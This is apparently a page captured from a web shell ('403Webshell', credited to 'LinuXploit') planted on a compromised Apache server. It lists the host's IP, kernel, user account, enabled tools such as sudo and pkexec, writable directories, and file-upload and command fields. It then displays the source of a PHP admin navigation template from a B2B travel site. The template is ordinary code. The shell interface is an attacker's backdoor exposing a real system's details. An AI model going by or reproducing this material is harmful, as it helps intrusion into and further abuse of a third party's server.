403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/b2bzend/application/admin/layouts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/b2bzend/application/admin/layouts/top-navigation.phtml

<!--Navigation Top Bar Start-->
<nav class="navigation">
    <div class="container-fluid">
        <!--Logo text start-->
        <div class="header-logo">
            <a href="<?php echo $this->baseUrl('admin/lead/list'); ?>" title="">
                <h1><img src="<?php echo $this->baseUrl('public/assets/images/gtxLogo.png'); ?>" alt="GTX"></h1>
            </a>
        </div>
        <!--Logo text End-->
        <div class="top-navigation">
            <!--Collapse navigation menu icon start -->
            <!--<div class="menu-control hidden-xs">
                <a href="javascript:void(0)">
                    <i class="fa fa-exchange"></i>
                </a>
            </div>!-->


            <!--Collapse navigation menu icon end -->
            <!--Top Navigation Start-->

            <ul>
                <li class="hidden-xs">

                    Welcome - <?php echo ucfirst(Travel_Model_AdminAuth::getIdentity()->UserName); ?>
                </li>
                <li class="dropdown">
                    <!--Notification drop down start-->
                    <a class="dropdown-toggle" data-toggle="dropdown" href="javascript:void(0)">
                        <span class="fa fa-bell-o"></span>
                        
                    </a>

                    
                    <!--Notification drop down end-->
                </li>

                <!--                <li class="hidden-xs">
                                    <a class="right-sidebar" href="javascript:void(0)">
                                        <i class="fa fa-comment-o"></i>
                                    </a>
                                </li>-->




                <li class="dropdown">
                    <!--Notification drop down start-->
                    <a class="dropdown-toggle" data-toggle="dropdown" href="javascript:void(0)">
                        <i class="fa fa-cogs"></i>
                    </a>

                    <div class="dropdown-menu right top-notification">
                        <!--<h4>Account Setting</h4>-->
                        <ul class="ls-feed">
<!--                            <li>
                                <a href="<?php // echo $this->baseUrl('settings/company-profile'); ?>">
                                    <span class="label label-red">
                                        <i class="fa fa-user white"></i>
                                    </span>
                                    Profile

                                </a>
                            </li>-->
<!--                            <li>
                                <a href="<?php // echo $this->baseUrl('/settings/change-password'); ?>">
                                    <span class="label label-light-green">
                                        <i class="fa fa-lock"></i>
                                    </span>

                                    Change Password
                                </a>
                            </li>-->
                            <li>
                                <a href="<?php echo $this->baseUrl('/admin/index/logout'); ?>">
                                    <span class="label label-lightBlue">
                                        <i class="fa fa-power-off"></i>
                                    </span>
                                    Logout
                                </a>
                            </li>




                        </ul>
                    </div>
                    <!--Notification drop down end-->
                </li>

            </ul>
            <!--Top Navigation End-->
            
        </div>
    </div>
</nav>
<!--Navigation Top Bar End-->
<script>
    $("#anchorId").click(function (e) {
        $.ajax({
            url: '/dashboard/agency/add-funds',
            dataType: 'json',
            success: function (response) {
                $("#guid").val(response.guid);
                $("#securecode").val(response.secureCode);
            }
        }).done(function () {
            $("#recharge_from_top").submit();
        });
//        
    });


</script>

Youez - 2016 - github.com/yon3zu
LinuXploit